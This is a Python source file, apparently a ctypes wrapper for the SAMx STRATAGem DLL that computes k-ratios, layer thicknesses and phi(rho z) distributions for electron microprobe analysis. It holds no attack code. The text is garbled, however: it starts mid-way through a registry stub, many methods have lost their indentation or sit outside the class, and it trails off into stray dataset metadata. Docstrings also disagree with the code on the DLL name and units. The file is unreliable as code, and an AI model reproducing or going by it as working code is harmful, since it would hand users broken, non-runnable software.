        # returns a no-op context manager and QueryValueEx() returns None,
        # which means an explicit *dll_path* must be supplied on these
        # platforms.
        class winreg:
            HKEY_CURRENT_USER = None

            class _PyHKEY(object):
                def __enter__(self):
                    return self

                def __exit__(self, exc_type, exc_value, traceback):
                    pass

            # Static with optional *res*/*sam* to match the real
            # winreg.OpenKey(key, sub_key[, reserved[, access]]) signature;
            # the previous instance-method form raised TypeError when called
            # as winreg.OpenKey(hive, subkey).
            @staticmethod
            def OpenKey(key, sub_key, res=0, sam=None):
                return winreg._PyHKEY()

            @staticmethod
            def QueryValueEx(key, value_name):
                return None
# Third party modules.
# Local modules.
from stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF
from stratagemtools.experiment import Experiment, LINE_KA
from stratagemtools.element_properties import \
atomic_mass_kg_mol, mass_density_kg_m3
# Globals and constants variables.
_REGISTRY_KEY = "Software\SAMx\Stratagem\Configuration"
_REGISTRY_VALUENAME = 'InstallOEMDirectory'
PRZMODE_XPP = 0
""":math:`\\phi(\\rho z)` from XPP"""
PRZMODE_PAP = 1
""":math:`\\phi(\\rho z)` from PAP"""
PRZMODE_GAU = 2
""":math:`\\phi(\\rho z)` *unknown*, possibly two Gaussians"""
FLUORESCENCE_NONE = 0
"""No fluorescence"""
FLUORESCENCE_LINE = 1
"""Only characteristic fluorescence"""
FLUORESCENCE_LINE_CONT = 2
"""Characteristic and Bremsstrahlung fluorescence"""
_CONCENTRATION_FLAG_KNOWN = 0
_CONCENTRATION_FLAG_UNKNOWN = 1
_CONCENTRATION_FLAG_STOICHIOMETRIC = 2
_CONCENTRATION_FLAG_TRACE = 3
_CONCENTRATION_FLAG_DIFFERENCE = 4
class StratagemError(Exception):
    """
    Exception raised for all errors related to the STRATAGem interface.

    The message either comes from the DLL's own error lookup (see
    :meth:`Stratagem._raise_error`) or is a fallback description supplied by
    the caller.
    """
    pass
def _check_key(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
if self._key is None:
raise StratagemError('Not initialize. Call init().')
return method(self, *args, **kwargs)
return wrapper
class Stratagem:
"""
Main interface establishing a connection to the STRATAGem OEM interface and
perform calculations using SAMx's STRATAGem.
It is highly recommended to use :class:`Stratagem` as a context manager
(i.e. ``with`` statement) to ensure that the connection to the DLL is
properly closed.
For instance::
>>> with Stratagem() as strata:
... strata.prz_mode = PRZMODE_XPP
Otherwise the following series of method must be called::
>>> strata = Stratagem()
>>> strata.init()
>>> strata.prz_mode = PRZMODE_XPP
>>> strata.close()
"""
    def __init__(self, dll_path=None, display_error=True):
        """
        :arg dll_path: complete path to the location of ``stratadllogger.dll``
            (optional). If ``None``, the path is found in the Windows registry
            under ``Software\SAMx\Stratagem\Configuration``. If the DLL is not
            found a :class:`StratagemError` is raised.
        :type dll_path: :class:`str`
        :arg display_error: whether to display a message dialog on error
        :type display_error: :class:`bool`
        """
        if dll_path is None:
            # Locate the DLL from the STRATAGem installation registry entry.
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY) as key: #@UndefinedVariable
                basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0] #@UndefinedVariable
            dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')
        # Loading the DLL can change the process working directory
        # (presumably a side effect of the DLL itself) -- save and restore it.
        cwd = os.getcwd()
        try:
            logger.debug("dll=%s", dll_path)
            self._lib = c.WinDLL(dll_path)
        finally:
            os.chdir(cwd) # Change back to real cwd
        logger.debug("StEnableErrorDisplay(%r)", display_error)
        self._lib.StEnableErrorDisplay(c.c_bool(display_error))
        self._key = None # DLL object key, created by init()
        self._cwd = os.getcwd()
        self._layers = {} # layer: index
        self._substrate = None # (layer, index) tuple, set by set_sample()
        self._experiments = {} # experiment: (element, line, kratio) indexes
        self._tmpstandards = [] # standard files removed again by close()
    def __enter__(self):
        # Context-manager entry: open the connection to the DLL.
        self.init()
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        # Context-manager exit: always close; never suppress exceptions.
        self.close()
        return False
    def _stobjectnew(self, key=None, standard=False):
        """
        Internal method creating a new STRATAGem object inside the DLL.

        :arg key: identifier of the object; a random 8-letter lowercase
            string is generated when ``None``
        :arg standard: whether the object describes a standard (``True``)
            instead of a regular sample (``False``)
        :return: the key as a :mod:`ctypes` string buffer
        """
        if key is None:
            characters = string.ascii_lowercase
            key = ''.join(random.choice(characters) for _ in range(8))
            key = key.encode('ascii')
        if not isinstance(key, c.c_byte):
            key = c.create_string_buffer(key)
        bnormal_ = c.c_bool(not standard)
        iniflags_ = c.c_int(0)
        logger.debug("StObjectNew(key, %r, %i)", not standard, 0)
        if not self._lib.StObjectNew(key, bnormal_, iniflags_):
            self._raise_error("Cannot create object")
        return key
    def _raise_error(self, alternate=''):
        """
        Raises a :class:`StratagemError`.
        The error code and message of known errors are retrieved from STRATAGem.
        If this is not possible, *alternate* is used as the error message.

        :arg alternate: fallback message when the DLL reports no error
        :raises StratagemError: always (or an :class:`OSError` via ``WinError``)
        """
        errnum_ = c.c_ulong()
        errtype_ = c.c_int()
        self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))
        if errnum_.value != 0:
            if errtype_.value == 0:
                # Error type 0: STRATAGem's own error -- look up its message.
                buf_ = c.create_string_buffer(256)
                self._lib.StGetMsg(errnum_, buf_, 256)
                raise StratagemError(buf_.value.decode('ascii'))
            elif errtype_.value == 1:
                # Error type 1: Windows system error.
                raise c.WinError(errtype_.value)
            else:
                raise StratagemError('Error %i' % errnum_.value)
        else:
            raise StratagemError(alternate)
    def init(self):
        """
        Initializes and setups STRATAGem.
        It does not have to be used if :class:`Stratagem` is used as a context
        manager.

        :raises RuntimeError: if already initialized
        """
        if self._key is not None:
            raise RuntimeError('Already initialized. Call close() first.')
        self._key = self._stobjectnew()
        # Remember the working directory so reset() can restore it later.
        self._cwd = os.getcwd()
        self.reset()
    def close(self):
        """
        Closes the connection to the STRATAGem DLL.
        It does not have to be used if :class:`Stratagem` is used as a context
        manager.
        """
        if self._key is not None:
            logger.debug('StObjectDelete(key)')
            self._lib.StObjectDelete(self._key)
            self._key = None
        # Remove the temporary standard files written by _create_standard().
        for filepath in self._tmpstandards:
            os.remove(filepath)
            logger.debug('Remove temporary standard: %s', filepath)
        self.reset()
    def reset(self):
        """
        Resets all parameters to the defaults, remove all experiments and sample.
        """
        if self._key:
            self._lib.StObjectReset(self._key)
        # Restore the working directory saved in init().
        os.chdir(self._cwd)
        self._layers.clear() # layer: index
        self._substrate = None
        self._experiments.clear() # analyzed experiments
        self._tmpstandards.clear()
@_check_key
def set_sample(self, sample):
"""
Sets the sample, which will be used in all subsequent calculations.
Note that only one sample can be defined.
:arg sample: sample definition
:type sample: :class:`Sample`
"""
self.reset()
for layer in sample.layers:
index = self._add_layer(layer, substrate=False)
self._layers.setdefault(layer, index)
index = self._add_layer(sample.substrate, substrate=True)
self._substrate = (sample.substrate, index)
    @_check_key
    def get_sample(self):
        """
        Returns the current sample.
        It can correspond to the sample defined by :meth:`set_sample` or the
        sample resulting from the computations (see :meth:`compute`).
        .. note:: a new sample is returned every time this method is called
        :return: current sample
        :rtype: :class:`Sample`
        """
        # NOTE(review): fails with a TypeError if no sample was set
        # (self._substrate is None) -- presumably set_sample() is expected
        # to have been called first.
        sample = Sample(self._substrate[0].composition)
        for layer in self._layers:
            sample.add_layer(layer.composition, layer.thickness_m,
                layer.mass_thickness_kg_m2, layer.density_kg_m3)
        return sample
    sample = property(get_sample, set_sample, doc="Property to set/get sample")
def _add_layer(self, layer, substrate=False, key=None):
"""
Internal method to add a layer from top to bottom.
The last layer added is considered as the substrate.
:arg layer: layer
:type layer: :class:`.Layer`
:return: index of the layer
"""
if key is None:
key = self._key
logger.debug("StSdAddLayer(key)")
ilayer_ = self._lib.StSdGetNbLayers(key)
logger.debug("StSdAddLayer(key, %i)", ilayer_)
if not self._lib.StSdAddLayer(key, ilayer_):
self._raise_error("Cannot add layer")
for i, value in enumerate(layer.composition.items()):
ielt_ = c.c_int(i)
logger.debug("StSdAddElt(key, %i, %i)", ilayer_, i)
if not self._lib.StSdAddElt(key, ilayer_, ielt_):
self._raise_error("Cannot add element")
z, wf = value
nra_ = c.c_int(z)
logger.debug("StSdSetNrAtom(key, %i, %i, %i)", ilayer_, i, z)
if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):
self._raise_error("Cannot set atomic number")
if wf is None or wf == CONC_UNKNOWN:
flag = _CONCENTRATION_FLAG_UNKNOWN
elif wf == CONC_DIFF:
flag = _CONCENTRATION_FLAG_DIFFERENCE
else:
flag = _CONCENTRATION_FLAG_KNOWN
wf_ = c.c_double(wf)
logger.debug("StSdSetConc(key, %i, %i, %f)", ilayer_, i, wf)
if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):
self._raise_error("Cannot set concentration")
logger.debug("StSdSetConcFlag(key, %i, %i, %i)", ilayer_, i, flag)
if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)):
self._raise_error("Cannot set concentration flag")
if not substrate:
thick_known = layer.is_thickness_known()
thick_known_ = c.c_bool(thick_known)
if layer.is_density_known():
density = layer.density_kg_m3 / 1e3 # g/cm3
else:
density = 10.0
density_ = c.c_double(density)
if thick_known:
thickness = layer.thickness_m * 1e10 # Angstroms
mass_thickness = layer.mass_thickness_kg_m2 * 0.1 # g/cm2
else:
thickness = 0.0
mass_thickness = 0.0
thickness_ = c.c_double(thickness)
mass_thickness_ = c.c_double(mass_thickness)
logger.debug("StSdSetThick(key, %i, %r, %d, %d, %d)", ilayer_,
thick_known, mass_thickness, thickness, density)
if not self._lib.StSdSetThick(key, ilayer_, thick_known_,
mass_thickness_, thickness_, density_):
self._raise_error("Cannot set thickness")
return int(ilayer_)
    def _create_standard(self, standard):
        """
        Internal method to create a new object defining the standard
        :class:`.Sample`.

        The standard is written to a ``.tfs`` file inside the standard
        directory; the file is removed again when :meth:`close` is called.

        :arg standard: sample acting as a standard
        :return: path to the saved standard file
        """
        # Create new object
        key_ = self._stobjectnew(standard=True)
        # Set sample
        for layer in standard.layers:
            self._add_layer(layer, substrate=False, key=key_)
        self._add_layer(standard.substrate, substrate=True, key=key_)
        # Save
        filename = key_.value.decode('ascii') + '.tfs'
        filepath = os.path.join(self.get_standard_directory(), filename)
        filepath_ = c.create_string_buffer(filepath.encode('ascii'))
        logger.debug('StObjectWriteFile(key, %s)', filepath)
        if not self._lib.StObjectWriteFile(key_, filepath_):
            self._raise_error("Cannot save standard")
        # Delete object
        self._lib.StObjectDelete(key_)
        self._tmpstandards.append(filepath)
        return filepath
    @_check_key
    def add_experiment(self, experiment):
        """
        Adds an experiment, i.e. measurements of k-ratio at different energies.
        .. hint:: Use :meth:`reset` method to remove defined experiments.
        :arg experiment: experiment
        :type experiment: :class:`Experiment`
        """
        # Register the element/line/energy and retrieve the DLL indexes.
        nra_ = c.c_int(experiment.z)
        klm_ = c.c_int(experiment.line)
        hv_ = c.c_double(experiment.energy_eV / 1e3)
        ielt_ = c.c_int()
        iline_ = c.c_int()
        iexpk_ = c.c_int()
        logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z, experiment.line)
        if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_,
                                             c.byref(ielt_), c.byref(iline_), c.byref(iexpk_)):
            self._raise_error("Cannot add atomic number and line")
        standard = experiment.standard
        if isinstance(standard, Sample):
            # A Sample standard is first written out to a temporary .tfs file.
            standard = self._create_standard(standard)
        standard_ = c.create_string_buffer(standard.encode('ascii'))
        logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value, iline_.value, klm_.value, standard)
        if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_):
            self._raise_error("Cannot set standard")
        analyzed = experiment.is_analyzed()
        analyzed_ = c.c_bool(analyzed)
        logger.debug("StEdSetAnalyzedFlag(key, %i, %r)", ielt_.value, analyzed)
        if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):
            self._raise_error("Cannot add experiment analyzed flag")
        kratio_ = c.c_double(experiment.kratio)
        logger.debug("StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)",
                     ielt_.value, iline_.value, iexpk_.value,
                     experiment.energy_eV / 1e3, experiment.energy_eV / 1e3,
                     experiment.kratio)
        if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_,
                                     hv_, hv_, kratio_, c.c_double(0.0),
                                     c.c_int(2)):
            self._raise_error("Cannot set experiment k-ratio")
        if experiment.is_analyzed():
            # Only analyzed experiments are tracked for result retrieval.
            indexes = (ielt_.value, iline_.value, iexpk_.value)
            self._experiments.setdefault(experiment, indexes)
@_check_key
def add_experiments(self, *exps):
"""
Adds several experiments::
>>> strata.add_experiments(exp1, exp2, exp3)
"""
for exp in exps:
self.add_experiment(exp)
def get_experiments(self):
"""
Returns a :class:`tuple` of all defined experiments.
:rtype: :class:`tuple`
"""
return tuple(self._experiments.keys())
    @_check_key
    def set_geometry(self, toa, tilt, azimuth):
        """
        Sets the geometry.
        :arg toa: take off angle (in radians)
        :arg tilt: tilt angle (in radians)
        :arg azimuth: azimuthal angle (in radians)
        """
        # Wrap as C doubles for the DLL call.
        toa_ = c.c_double(toa)
        tilt_ = c.c_double(tilt)
        azimuth_ = c.c_double(azimuth)
        logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)
        if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):
            self._raise_error("Cannot set geometry parameters")
    @_check_key
    def get_geometry(self):
        """
        Returns the geometry.
        :return: take off angle (in radians), tilt angle (in radians),
            azimuthal angle (in radians)
        """
        # Output parameters filled in by the DLL.
        toa_ = c.c_double()
        tilt_ = c.c_double()
        azimuth_ = c.c_double()
        logger.debug('StGetGeomParams(key)')
        if not self._lib.StGetGeomParams(self._key, c.byref(toa_),
                                         c.byref(tilt_), c.byref(azimuth_)):
            self._raise_error("Cannot get geometry parameters")
        return toa_.value, tilt_.value, azimuth_.value
    geometry = property(get_geometry, doc='Property to get geometry')
    @_check_key
    def set_prz_mode(self, mode):
        """
        Sets the type of model to use for the :math:`\\phi(\\rho z)`.
        :arg mode: type of model, either
            * :data:`PRZMODE_XPP`
            * :data:`PRZMODE_PAP`
            * :data:`PRZMODE_GAU`
        :type mode: :class:`int`
        """
        mode_ = c.c_int(mode)
        logger.debug('StSetPrzMode(%i)', mode)
        # NOTE(review): unlike most setters, the return value of this DLL
        # call is not checked for errors.
        self._lib.StSetPrzMode(mode_)
    @_check_key
    def get_prz_mode(self):
        """
        Returns the type of model to use for the :math:`\\phi(\\rho z)`.
        :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or
            :data:`PRZMODE_GAU`
        :rtype: :class:`int`
        """
        return self._lib.StGetPrzMode()
    prz_mode = property(get_prz_mode, set_prz_mode,
                        doc='Property to get/set prz mode')
    @_check_key
    def set_fluorescence(self, flag):
        """
        Sets the fluorescence flag.
        :arg flag: either
            * :data:`FLUORESCENCE_NONE`
            * :data:`FLUORESCENCE_LINE`
            * :data:`FLUORESCENCE_LINE_CONT`
        :type flag: :class:`int`
        """
        flag_ = c.c_int(flag)
        logger.debug('StSetFluorFlg(%i)', flag)
        # NOTE(review): the return value of this DLL call is not checked.
        self._lib.StSetFluorFlg(flag_)
    @_check_key
    def get_fluorescence(self):
        """
        Returns the fluorescence flag.
        :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`
            or :data:`FLUORESCENCE_LINE_CONT`
        :rtype: :class:`int`
        """
        return self._lib.StGetFluorFlg()
    fluorescence = property(get_fluorescence, set_fluorescence,
                            doc='Property to get/set fluorescence')
    @_check_key
    def set_standard_directory(self, dirpath):
        """
        Sets the directory where standard files are stored.
        :arg dirpath: path to directory
        :type dirpath: :class:`str`
        """
        dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))
        # First argument 1 selects the standards directory -- TODO confirm
        # against the STRATAGem OEM documentation.
        self._lib.StSetDirectory(c.c_int(1), dirpath_)
    @_check_key
    def get_standard_directory(self):
        """
        Returns the directory where standard files are stored.
        :rtype: :class:`str`
        """
        # Fixed 256-byte buffer: longer paths would be truncated by the DLL.
        dirpath = (c.c_char * 256)()
        self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)
        return dirpath.value.decode('ascii')
    standard_directory = property(get_standard_directory, set_standard_directory,
                                  doc='Property to get/set standard directory')
    @_check_key
    def compute_kratio_vs_thickness(self, layer,
                                    thickness_low_m, thickness_high_m, step):
        """
        Computes the variation of the k-ratio as a function of the thickness
        for a layer.
        :arg layer: layer of a sample (must have been previously added)
        :type layer: :class:`.Layer`
        :arg thickness_low_m: lower limit of the thickness in meters
        :type thickness_low_m: :class:`float`
        :arg thickness_high_m: upper limit of the thickness in meters
        :type thickness_high_m: :class:`float`
        :arg step: number of steps
        :type step: :class:`int`
        :return: :class:`tuple` containing
            * :class:`list` of thicknesses
            * :class:`dict` where the keys are experiments (as defined by
              :meth:`.add_experiment`) and the values are :class:`list`
              containing k-ratios for each thickness
        """
        logger.debug('StSetKvsThicknessUnit(2)')
        self._lib.StSetKvsThicknessUnit(2) # unit in nm
        if layer not in self._layers:
            raise ValueError("Unknown layer")
        ilayer = self._layers[layer]
        ilayer_ = c.c_int(ilayer)
        step_ = c.c_int(step)
        logger.debug('StSetNbComputedHV(%i)', step)
        self._lib.StSetNbComputedHV(step_)
        # Compute
        # Meters -> nanometers, the unit selected above.
        low_ = c.c_double(thickness_low_m * 1e9)
        high_ = c.c_double(thickness_high_m * 1e9)
        logger.debug('StComputeKvsThickness(key, %i, %f, %f)',
                     ilayer, thickness_low_m * 1e9, thickness_high_m * 1e9)
        if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_):
            self._raise_error("Cannot compute k-ratio vs thickness")
        # Fetch results
        # The DLL computed step + 1 points (both bounds included); read the
        # thickness and the k-ratio of every experiment at each point.
        thicknesses = []
        kratios = {}
        thick_ = c.c_double()
        k_ = c.c_double()
        for i in range(step + 1):
            i_ = c.c_int(i)
            if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):
                self._raise_error("Cannot get thickness")
            thicknesses.append(thick_.value)
            for experiment, indexes in self._experiments.items():
                ielt_ = c.c_int(indexes[0])
                iline_ = c.c_int(indexes[1])
                iHv_ = c.c_int(indexes[2])
                if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,
                                             iHv_, c.byref(k_)):
                    self._raise_error("Cannot get k-ratio")
                kratios.setdefault(experiment, []).append(k_.value)
        return thicknesses, kratios
    @_check_key
    def compute_kratio_vs_energy(self, energy_high_eV, step):
        """
        Computes the variation of the k-ratio as a function of the incident
        energy.
        Note that the computation also starts at 0 keV up to the specified energy.
        :arg energy_high_eV: upper limit of the thickness in electronvolts
        :type energy_high_eV: :class:`float`
        :arg step: number of steps
        :type step: :class:`int`
        :return: :class:`tuple` containing
            * :class:`list` of energies in electronvolts
            * :class:`dict` where the keys are experiments (as defined by
              :meth:`.add_experiment`) and the values are :class:`list`
              containing k-ratios for each energy
        """
        step_ = c.c_int(step)
        logger.debug('StSetNbComputedHV(%i)', step)
        self._lib.StSetNbComputedHV(step_)
        # eV -> keV for the DLL.
        energy_ = c.c_double(energy_high_eV / 1e3)
        logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1e3,))
        self._lib.StSetMaxHV(energy_)
        # Compute
        logger.debug('StComputeKvsHV(key)')
        if not self._lib.StComputeKvsHV(self._key):
            self._raise_error("Cannot compute k-ratio vs energy")
        # Fetch results
        energies = []
        kratios = {}
        k_ = c.c_double()
        bHV_ = c.c_bool(True)
        increment = float(energy_high_eV / 1e3) / step
        for i in range(step + 1):
            # NOTE(review): hv is in keV here although the docstring says the
            # returned energies are in electronvolts -- confirm intended unit.
            hv = i * increment
            hv_ = c.c_double(hv)
            for experiment, indexes in self._experiments.items():
                ielt_ = c.c_int(indexes[0])
                iline_ = c.c_int(indexes[1])
                if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_, bHV_, c.byref(k_)):
                    self._raise_error("Cannot get k-ratio")
                kratios.setdefault(experiment, []).append(k_.value)
            energies.append(hv)
        return energies, kratios
@_check_key
def compute_kratios(self):
"""
Computes the k-ratios of the different experiments.
:return: :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are k-ratios
(:class:`float`).
"""
if len(self._layers) == 0:
return self._compute_kratios_substrate()
else:
return self._compute_kratios_multilayers()
    @_check_key
    def _compute_kratios_multilayers(self):
        """
        Internal method to compute the k-ratios using the
        :meth:`compute_kratio_vs_thickness`.

        All layer thicknesses must be known. The k-ratio at the first layer's
        actual thickness is taken as the first point of a one-step thickness
        sweep.

        :raises ValueError: if the thickness of a layer is unknown
        """
        for i, layer in enumerate(self._layers.keys()):
            if not layer.is_thickness_known():
                raise ValueError("Thickness of layer %i is unknown" % i)
        # Compute
        # Sweep from the layer's own thickness (the value of interest) to
        # 10x that thickness in a single step; only point 0 is used below.
        layer = list(self._layers.keys())[0]
        thickness_low_m = layer.thickness_m
        thickness_high_m = layer.thickness_m * 10
        step = 1
        _thicknesses, kratios = \
            self.compute_kratio_vs_thickness(layer, thickness_low_m,
                                             thickness_high_m, step)
        # Reorganize results
        output = {}
        for experiment, kratio in kratios.items():
            output.setdefault(experiment, kratio[0])
        return output
@_check_key
def _compute_kratios_substrate(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_energy`.
"""
output = {}
step = 2
for experiment in self._experiments:
energy_high_eV = experiment.energy_eV
_energies, kratios = \
self.compute_kratio_vs_energy(energy_high_eV, step)
kratio = kratios[experiment][-1]
if (kratio < 0): # Bug in strategem that some energy don't work
logger.warn("STRATAGem returns a negative k-ratio, re-try with energy + 1 eV")
_energies, kratios = \
self.compute_kratio_vs_energy(energy_high_eV + 1.0, step)
kratio = kratios[experiment][-1]
output.setdefault(experiment, kratio)
return output
@_check_key
def compute(self, iteration_max=50):
    """
    Computes the unknown composition(s) and thickness(es) in the specified
    sample.

    :arg iteration_max: maximum number of iterations of the solve
        (default: 50)
    :type iteration_max: :class:`int`

    :return: calculated sample
    :rtype: :class:`.Sample`
    """
    # Add a dummy (non-analyzed) experiment for every element present in
    # a layer or in the substrate that has no measured experiment yet, so
    # the DLL is aware of all elements during the solve.
    zs = set(exp.z for exp in self._experiments.keys())
    for layer in list(self._layers.keys()) + [self._substrate[0]]:
        for z, wf in layer.composition.items():
            if z in zs:
                continue
            if wf is None:
                continue
            logger.debug('Added dummy experiment for z=%i', z)
            exp = Experiment(z, LINE_KA, 0.0, analyzed=False) # dummy
            self.add_experiment(exp)

    # Set iteration maximum
    iteration_max_ = c.c_int(iteration_max)
    logger.debug('StSetMaxNbIter(%i)', iteration_max)
    self._lib.StSetMaxNbIter(iteration_max_)

    # Run the iterative solve; the DLL sets continue_ to False when it
    # has converged (or hit the iteration cap).
    logger.debug('StComputeIterpStart(key)')
    if not self._lib.StComputeIterpStart(self._key):
        self._raise_error("Cannot start iteration")

    continue_ = c.c_bool(True)
    iteration = 0

    logger.debug('Start iteration')
    while True:
        iteration += 1
        logger.debug('Iteration #%i' % iteration)

        logger.debug('StComputeIterpNext(key, %r)' % continue_.value)
        # NOTE(review): a failing StComputeIterpNext call exits the loop
        # without raising -- presumably deliberate; confirm.
        if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):
            break

        if not continue_.value:
            break

    logger.debug('Iteration completed')

    # Fetch results. These ctypes out-parameters are shared closures,
    # reused by every get_layer() call below.
    thick_known = c.c_bool()
    mass_thickness = c.c_double()
    thickness = c.c_double()
    density = c.c_double()

    def get_layer(layer, ilayer):
        # Read back the computed composition and thickness of one layer
        # identified by its DLL index *ilayer*.
        ilayer_ = c.c_int(ilayer)

        logger.debug('StSdGetNbElts(key, %i)' % ilayer)
        nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)
        if nbelt == -1:
            self._raise_error("Cannot get number of elements")

        flag_ = (c.c_int * nbelt)()
        wfs_ = (c.c_double * nbelt)()
        logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)
        if not self._lib.StSdGetLayRawConcs(self._key, ilayer_,
                                            flag_, wfs_):
            self._raise_error("Cannot get layer concentration")

        # Map each atomic number of the layer to its computed weight
        # fraction via the DLL's element index.
        composition = {}
        for z in layer.composition.keys():
            nra_ = c.c_int(z)
            logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))
            zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)
            composition[z] = wfs_[zindex]

        logger.debug("StSdGetThick(key, %i)", ilayer)
        if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(thick_known),
                                      c.byref(mass_thickness), c.byref(thickness),
                                      c.byref(density)):
            self._raise_error("Cannot get thickness")

        # Unit conversions to SI -- from the factors this looks like
        # Angstrom -> m, g/cm2 -> kg/m2 and g/cm3 -> kg/m3; TODO confirm
        # against the STRATAGem documentation.
        return (composition, thickness.value / 1e10,
                mass_thickness.value * 10.0, density.value * 1e3)

    # Rebuild a Sample: substrate composition first, then each layer with
    # its computed composition, thickness, mass thickness and density.
    sample = Sample(get_layer(*self._substrate)[0])

    for layer, ilayer in self._layers.items():
        sample.add_layer(*get_layer(layer, ilayer))

    return sample
@_check_key
def compute_prz(self, maxdepth_m=None, bins=100):
    """
    Compute :math:`\\phi(\\rho z)` of all experiments.

    .. warning:: Only available for substrate (no layers).

    :arg maxdepth_m: maximum depth of the :math:`\\phi(\\rho z)`
        distribution in meters. If ``None``, Kanaya-Okayama electron range
        is used with a safety factor of 1.5.
    :type maxdepth_m: :class:`float`

    :arg bins: number of bins in the :math:`\\phi(\\rho z)` distribution
    :type bins: :class:`int`

    :return: a :class:`dict` where the keys are the experiments and the
        values are a tuple containing three lists:

        * :math:`\\rho z` coordinates (in g/cm2)
        * generated intensities of :math:`\\phi(\\rho z)` (no absorption)
        * emitted intensites of :math:`\\phi(\\rho z)`
    """
    if len(self._layers) > 0:
        raise RuntimeError('PRZ can only be computed for substrate')

    # Set scaling: the DLL energy scale is the highest experiment energy,
    # converted from eV to keV.
    hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())
    maxhv_eV = max(hvs_eV)
    maxhv_ = c.c_double(maxhv_eV / 1e3)
    logger.debug('StSetScaleHV(%s)', maxhv_eV / 1e3)
    self._lib.StSetScaleHV(maxhv_)

    # Compute
    logger.debug('StComputePrz(key)')
    if not self._lib.StComputePrz(self._key):
        self._raise_error('Cannot compute prz')

    # Get values: sample each experiment's distribution over *bins* depths.
    przs = {}

    for experiment, indexes in self._experiments.items():
        # Size of each bin
        if maxdepth_m is None:
            # Calculate max depth using Kanaya-Okayama electron range,
            # weighted over the substrate composition.
            # NOTE(review): maxdepth_m is None only on the first pass, so
            # every later experiment reuses the depth derived from the
            # FIRST experiment's energy -- confirm this is intended.
            maxdepth_m = 0.0
            energy_keV = experiment.energy_eV / 1e3

            for z, fraction in self._substrate[0].composition.items():
                dr = (0.0276 * atomic_mass_kg_mol(z) * 1e3 * energy_keV ** 1.67) / \
                    (z ** 0.89 * mass_density_kg_m3(z) / 1e3)
                maxdepth_m += fraction / (dr * 1e-6)

            maxdepth_m = 1.0 / maxdepth_m
            maxdepth_m *= 1.5 # safety factor

        increment_kg_m2 = (maxdepth_m * self._substrate[0].density_kg_m3) / bins

        # Indexes of the element and line within the DLL
        ielt_ = c.c_int(indexes[0])
        iline_ = c.c_int(indexes[1])
        ihv_ = c.c_int(0)

        rzs = []
        ys_generated = []
        ys_emitted = []

        for i in range(bins):
            # rz_ is handed to the DLL scaled by 0.1 (kg/m2 -> g/cm2,
            # presumably), while rzs keeps the unscaled kg/m2 value --
            # the docstring says g/cm2; TODO confirm which unit is right.
            rz_ = c.c_double(i * increment_kg_m2 * 0.1)
            rzs.append(i * increment_kg_m2)

            # Emitted intensity (absorption applied: bUseExp_ = True)
            y_ = c.c_double()
            bUseExp_ = c.c_bool(True)
            self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
                                bUseExp_, c.byref(y_))
            ys_emitted.append(y_.value)

            # Generated intensity (no absorption: bUseExp_ = False)
            y_ = c.c_double()
            bUseExp_ = c.c_bool(False)
            self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
                                bUseExp_, c.byref(y_))
            ys_generated.append(y_.value)

        przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))

    return przs
|
flexible
|
{
"blob_id": "6914656a2f78fa1fe74a67bf09b017585b3eac88",
"index": 2770,
